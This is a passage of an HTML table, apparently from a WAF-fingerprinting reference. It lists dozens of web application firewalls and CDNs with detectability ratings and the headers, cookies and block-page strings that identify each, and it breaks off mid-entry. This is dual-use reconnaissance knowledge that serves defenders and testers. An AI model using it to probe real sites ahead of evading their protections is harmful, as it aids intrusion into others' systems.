\u003ctd\u003e\n BulletProof Security Pro\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003ediv\u003c/code\u003e with id as \u003ccode\u003ebpsMessage\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eIf you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page.\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e \n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n CDN NS Application Gateway\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eCdnNsWAF Application Gateway\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Cerber (WordPress)\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eWe're sorry, you are not allowed to proceed\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYour request looks suspicious or similar to automated requests from spam posting software\u003c/code\u003e warning.\u003c/li\u003e\n \u003c/ul\u003e \n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Chaitin Safeline\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eevent_id\u003c/code\u003e keyword within HTML comments.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ChinaCache\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003ePowered-by-ChinaCache\u003c/code\u003e field.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Cisco ACE XML Gateway\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header has value \u003ccode\u003eACE XML Gateway\u003c/code\u003e set.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Cloudbric\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse content contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eMalicious Code Detected\u003c/code\u003e heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYour request was blocked by Cloudbric\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehttps://cloudbric.zendesk.com\u003c/code\u003e URL.\n \u003cli\u003e\u003ccode\u003eCloudbric Help Center\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003ePage title starting with \u003ccode\u003eCloudbric | ERROR!\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Cloudflare \n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers might have \u003ccode\u003ecf-ray\u003c/code\u003e field value.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header field has value \u003ccode\u003ecloudflare\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e response headers have \u003ccode\u003e__cfuid=\u003c/code\u003e cookie field.\u003c/li\u003e\n \u003cli\u003ePage content might have \u003ccode\u003eAttention Required!\u003c/code\u003e or \u003ccode\u003eCloudflare Ray ID:\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003ePage content may contain \u003ccode\u003eDDoS protection by Cloudflare\u003c/code\u003eas text.\u003c/li\u003e\n \u003cli\u003eYou may encounter \u003ccode\u003eCLOUDFLARE_ERROR_500S_BOX\u003c/code\u003e upon hitting invalid URLs.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n CloudfloorDNS\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header field has value \u003ccode\u003eCloudfloorDNS WAF\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlock-page title might have \u003ccode\u003eCloudfloorDNS - Web Application Firewall Error\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003ePage content may contain \u003ccode\u003ewww.cloudfloordns.com/contact\u003c/code\u003e URL as a contact link.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Cloudfront\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains \u003ccode\u003eGenerated by cloudfront (CloudFront)\u003c/code\u003e error upon malicious request.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Comodo cWatch\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eProtected by COMODO WAF\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n CrawlProtect\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse cookies might contain \u003ccode\u003ecrawlprotect\u003c/code\u003e cookie name.\u003c/li\u003e\n \u003cli\u003eBlock Page title has \u003ccode\u003eCrawlProtect\u003c/code\u003e keyword in it.\u003c/li\u003e\n \u003cli\u003eBlocked response content contains value\u003cbr\u003e \u003ccode\u003eThis site is protected by CrawlProtect !!!\u003c/code\u003e upon malicious request.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Deny-All\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse content contains value \u003ccode\u003eCondition Intercepted\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e header contains cookie field \u003ccode\u003esessioncookie\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Distil Web Protection\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain field value \u003ccode\u003eX-Distil-CS\u003c/code\u003e in all requests.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003ePardon Our Interruption...\u003c/code\u003e heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYou have disabled javascript in your browser.\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSomething about your browser made us think that you are a bot.\u003c/code\u003e text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n DoSArrest Internet Security\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain field value \u003ccode\u003eX-DIS-Request-ID\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eDOSarrest\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n DotDefender\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains value\u003cbr\u003e \u003ccode\u003edotDefender Blocked Your Request\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response headers contain \u003ccode\u003eX-dotDefender-denied\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n DynamicWeb Injection Check\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response headers contain \u003ccode\u003eX-403-Status-By\u003c/code\u003e field with value \u003ccode\u003edw-inj-check\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n e3Learning Security\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003ee3Learning_WAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n EdgeCast (Verizon)\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains value\u003cbr\u003e \u003ccode\u003ePlease contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon)\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response code returns \u003ccode\u003e400 Bad Request\u003c/code\u003e on malicious requests.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Eisoo Cloud\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page content may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003e/eisoo-firewall-block.css\u003c/code\u003e reference.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003ewww.eisoo.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003e\u0026copy; (year) Eisoo Inc.\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header has field value set to \u003ccode\u003eEisooWAF-AZURE/EisooWAF\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Expression Engine\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page returns \u003ccode\u003eInvalid URI\u003c/code\u003e generally.\u003c/li\u003e\n \u003cli\u003eBlocked response content contains value \u003ccode\u003eInvalid GET Request\u003c/code\u003e upon malicious GET queries.\u003c/li\u003e\n \u003cli\u003eBlocked POST type queries contain \u003ccode\u003eInvalid Data\u003c/code\u003e in response content.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n F5 ASM\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains warning\u003cbr\u003e\n \u003ccode\u003eThe requested URL was rejected. Please consult with your administrator.\u003c/code\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n FortiWeb\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eFORTIWAFSID=\u003c/code\u003e on malicious requests.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReference to \u003ccode\u003e.fgd_icon\u003c/code\u003e image icon.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer Unavailable!\u003c/code\u003e as heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer unavailable. Please visit later.\u003c/code\u003e as text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n GoDaddy\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains value\u003cbr\u003e \u003ccode\u003eAccess Denied - GoDaddy Website Firewall\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n GreyWizard\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eGrey Wizard\u003c/code\u003e as title.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eContact the website owner or Grey Wizard\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eWe've detected attempted attack or non standard traffic from your IP address\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003egreywizard\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Huawei Cloud\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReference to \u003ccode\u003eaccount.hwclouds.com/static/error/images/404img.jpg\u003c/code\u003e error image.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ewww.hwclouds.com\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ehws_security@{site.tld}\u003c/code\u003e e-mail for reporting.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n HyperGuard\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e header has cookie field \u003ccode\u003eODSESSION=\u003c/code\u003e in response headers.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n IBM DataPower\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contains field value value \u003ccode\u003eX-Backside-Transport\u003c/code\u003e with value \u003ccode\u003eOK\u003c/code\u003e or \u003ccode\u003eFAIL\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Imperva Incapsula\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page content may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003ePowered By Incapsula\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eIncapsula incident ID\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003e_Incapsula_Resource\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003esubject=WAF Block Page\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eNormal GET request headers contain \u003ccode\u003evisid_incap\u003c/code\u003e value.\u003c/li\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003eX-Iinfo\u003c/code\u003e header field name.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e header has cookie field \u003ccode\u003eincap_ses\u003c/code\u003e and \u003ccode\u003evisid_incap\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Imunify360\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contain \u003ccode\u003eimunify360-webshield\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003ePowered by Imunify360\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eimunify360 preloader\u003c/code\u003e if response type is JSON.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eprotected by Imunify360\u003c/code\u003e text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n IndusGuard\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains value \u003ccode\u003eIF_WAF\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response content contains warning\u003cbr\u003e\u003ccode\u003efurther investigation and remediation with a screenshot of this page.\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003eResponse headers contain a unique header \u003ccode\u003eX-Version\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Instart DX\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eX-Instart-Request-ID\u003c/code\u003e unique header.\u003c/li\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eX-Instart-WL\u003c/code\u003e unique header fingerprint.\u003c/li\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eX-Instart-Cache\u003c/code\u003e unique header fingerprint.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eThe requested URL was rejected. Please consult with your administrator.\u003c/code\u003e text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ISA Server\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eDifficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eThe ISA Server denied the specified Uniform Resource Locator (URL)\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThe server denied the specified Uniform Resource Locator (URL). Contact the server administrator.\u003c/code\u003e text snippet\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Janusec Application Gateway\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page has image displaying \u003ccode\u003eJANUSEC\u003c/code\u003e name and logo.\u003c/li\u003e\n \u003cli\u003eBlocked response page displays \u003ccode\u003eJanusec Application Gateway\u003c/code\u003e on malicious requests.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Jiasule\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains reference to \u003ccode\u003estatic.jiasule.com/static/js/http_error.js\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e header has cookie field \u003ccode\u003e__jsluid=\u003c/code\u003e or \u003ccode\u003ejsl_tracking\u003c/code\u003ein response headers.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header has \u003ccode\u003ejiasule-WAF\u003c/code\u003e keywords.\u003c/li\u003e\n \u003cli\u003eBlocked response content has \u003ccode\u003enotice-jiasule\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n KeyCDN\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eKeyCDN\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n KnownSec\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: 